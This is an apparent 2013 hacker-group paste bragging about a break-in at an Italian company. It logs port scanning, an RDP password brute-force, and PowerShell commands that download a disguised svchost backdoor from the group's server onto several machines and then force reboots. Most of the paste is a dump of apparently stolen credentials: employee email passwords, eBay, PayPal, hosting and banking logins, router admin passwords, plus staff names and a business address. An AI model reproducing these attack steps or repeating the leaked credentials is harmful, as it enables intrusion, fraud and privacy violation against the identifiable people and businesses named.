1.   _______    _____  _      _______                  
  2.  |__   __|  |  __ \| |    |__   __|                  
  3.     | |_   _| |__) | | __    | | ___  __ _ _ __ ___  
  4.     | | | | |  _  /| |/ /    | |/ _ \/ _` | '_ ` _ \
  5.     | | |_| | | \ \|   <     | |  __/ (_| | | | | | |
  6.     |_|\__,_|_|  \_\_|\_\    |_|\___|\__,_|_| |_| |_|
  7.                                                      
  8.      Website: turkhackarmy.org  
  9.  
  10. New target: nuovacosmo.dlinkddns.com   
  11.                                                                                                  
  12. --- PING 2.112.52.162 (2.112.52.162) 56(84) bytes of data. ---
  13. 64 bytes from 2.112.52.162: icmp_req=1 ttl=49 time=6.23 ms
  14. 64 bytes from 2.112.52.162: icmp_req=2 ttl=49 time=6.44 ms
  15. 64 bytes from 2.112.52.162: icmp_req=3 ttl=49 time=6.29 ms
  16. 64 bytes from 2.112.52.162: icmp_req=4 ttl=49 time=6.58 ms
  17.  
  18. ./SWhois 2.112.52.162
  19. route:          2.112.0.0/15
  20. descr:          INTERBUSINESS
  21. id:                     AS3269
  22. origin:                 ibs-resid.milano26.mil.seabone.net
  23. name:           Nuova Cosmo S.r.l.
  24. organization:   Nuova Cosmo S.r.l.
  25. address:                Via Giuseppe di Vittorio, 17, Inzago Milano
  26. telephone:              +00390295310298
  27.  
  28. ./nmap -F -T5 -Pn -sS 2.112.52.162
  29. Host is up (0.016s latency).
  30. PORT STATE SERVICE
  31. 21/tcp open ftp
  32. 3389/tcp open RDP (Remote Desktop Microsoft)
  33.  
  34. Nmap done: 1 IP address (1 host up) scanned in 9.17 seconds
  35.  
  36. WOAH nice!
  37.  
  38. ./rdp_bruteforce 2.112.52.162 administrator passwlist.txt
  39. [+]Starting!
  40. ...................................................Found! (5043 sec)
  41. [!]Administrator@2.112.52.162 PWD='inzago2010' !
  42. [-]Finish.
  43.  
  44. ./rdp_client Administrator:inzago201@2.112.52.162
  45. Connecting..
  46. Connected.
  47.  
  48. WTF? too easy :/
  49. There's a lot of pc with no-login shared directory..
  50.  
  51. Network>
  52.  
  53. DAVIDE \DOCUMENTI
  54. ELENA-PC \UTENTI \DOCUMENTI-ELE \DOWNLOADS \SCANSIONI
  55. SERVER2 \BANCHE \DOCUMENTI \C (DRIVE)
  56. SERVER \BACKUP \UTENTI
  57. ASSISTENZA \C (DRIVE) \D (DRIVE) \E (DRIVE)
  58. PIA-PC \       
  59. DIREZIONE \CONDIVISA
  60. COMMERCIALE \DRIVE \DOCUMENTI
  61. OFFICINA \
  62. USER-PC \
  63. SEGRETERIA \C (DRIVE)
  64.  
  65. PS C:\> Invoke-WebRequest http:\\netshare.turkhackarmy.org\elon\svchost_variant.exe -OutFile \\ASSISTENZA\WINDOWS\SYSTEM32\SVCHOST.EXE
  66. PS C:\> Invoke-WebRequest http:\\netshare.turkhackarmy.org\elon\svchost_variant.exe -OutFile \\SERVER2\WINDOWS\SYSTEM32\SVCHOST.EXE
  67. PS C:\> Invoke-WebRequest http:\\netshare.turkhackarmy.org\elon\svchost_variant.exe -OutFile \\SEGRETERIA\WINDOWS\SYSTEM32\SVCHOST.EXE
  68. PS C:\> shutdown -R -M \\ASSISTENZA -t 0
  69. PS C:\> shutdown -R -M \\SERVER2 -t 0
  70. PS C:\> shutdown -R -M \\SEGRETERIA -t 0
  71.  
  72. Worked, backdoor installed.
  73. G0T R00T !
  74.  
  75. Files and infos gained:
  76.  
  77. Marcello        Direzione       192.168.0.7     ollecram        m.amore@nuovacosmo.it   ollecram       
  78. Marcello        Direzione       192.168.0.7     ollecram        info@workservices.it    work2009       
  79. Marcello        Direzione       192.168.0.7     ollecram        m.amore@nuovacosmo.it   marcello54     
  80. Matteo  Assistenza      192.168.0.1     ingrid  assistenza@workservices.it      work2009       
  81. Carlo   Segreteria      192.168.0.2     malto2006       carlo.amore@workservices.it     carlo86
  82. Pia     Commerciale     192.168.0.3     no      pia.amore@workservices.it       work2011       
  83. Davide  Ordini  192.168.0.115   davide  info@nuovacosmo.it      ollecram       
  84. Elena   Server          cagnolino       segreteria@nuovacosmo.it        elena  
  85. Francesco       NC COMMERC              23122000        f.dandrea@nuovacosmo.it fra     nc2006
  86. Luisa   NC CONTAB               cassano2006     contabilita@nuovacosmo.it       inzago2010     
  87. IP CAM  expo    192.168.0.20            no             
  88. Officina        Officina        192.168.0.117   officina        no      officina       
  89. EBAY nuovacosmo 2010work
  90. EBAY workservices       work2009
  91. Username:               assistenza@workservices.it Password:            workservices
  92. Paypal info@workservices.it     2010work
  93.  
  94. info@nuovacosmo.it zh?9Eqx(?12!
  95. milan@nuovacosmo.it zh?9Eqx(?12!
  96. segreteria@nuovacosmo.it !qazmlp!
  97. contabilita@nuovacosmo.it !qazmlp!
  98. f.dandrea@nuovacosmo.it !qazmlp!
  99. m.amore@nuovacosmo.it !qazmlp!
  100. info@workservices.it ollecram!
  101. m.amore@workservices.it ollecram!
  102. assistenza@workservices.it ollecram!
  103. pia.amore@workservices.it ollecram!
  104. elena.amore@workservices.it ollecram!
  105. offertews@gmail.com work2012
  106. 192.168.1.254 admin atlantis
  107. 192.168.1.110 admin workservices
  108. 192.168.1.109 admin workservices
  109.  
  110.  
  111. http://hosting.aruba.it/ 737921@aruba.it 0la47pqx31
  112. http://hosting.aruba.it/ 1422396@aruba.it 73avb14hxwe
  113. http://it.adveovision.net/Login.aspx 5010120 schiavonepia work2012!
  114. http://www.esprinet.com/public/ 1602147001 work2012
  115. http://www.brevi.it/ CLI7088 03368170969
  116. http://www.techdata.it/Pages/Start.aspx 594274 2010work
  117. http://www.datamatic.it/private/home/ 946683 work2012!
  118. http://www.acquistinretepa.it/opencms/ SCHMRP000 Workservices2013
  119. https://signin.ebay.it/ws/eBayISAPI.dll nuovacosmo ymzx735qmgf
  120. https://signin.ebay.it/ws/eBayISAPI.dll workservices 2SrspkgsGZ
  121. https://www.paypal.com/it/cgi-bin/webscr info@workservices.it adgje!?thuk!qJ?
  122. https://ibbweb.tecmarket.it/ P2006371 JWB4G NCOSMO13
  123.  
  124. There's a lot of password..
  125. Hacked www.nuovacosmo.it
  126. Hacked www.workservices.it
  127. Hacked www.studiomartesana.com
  128.  
  129. [-]Attack finished.

Posted by Anonymous at 30 Aug 2013, 08:10:28 Etc/UTC
Language: text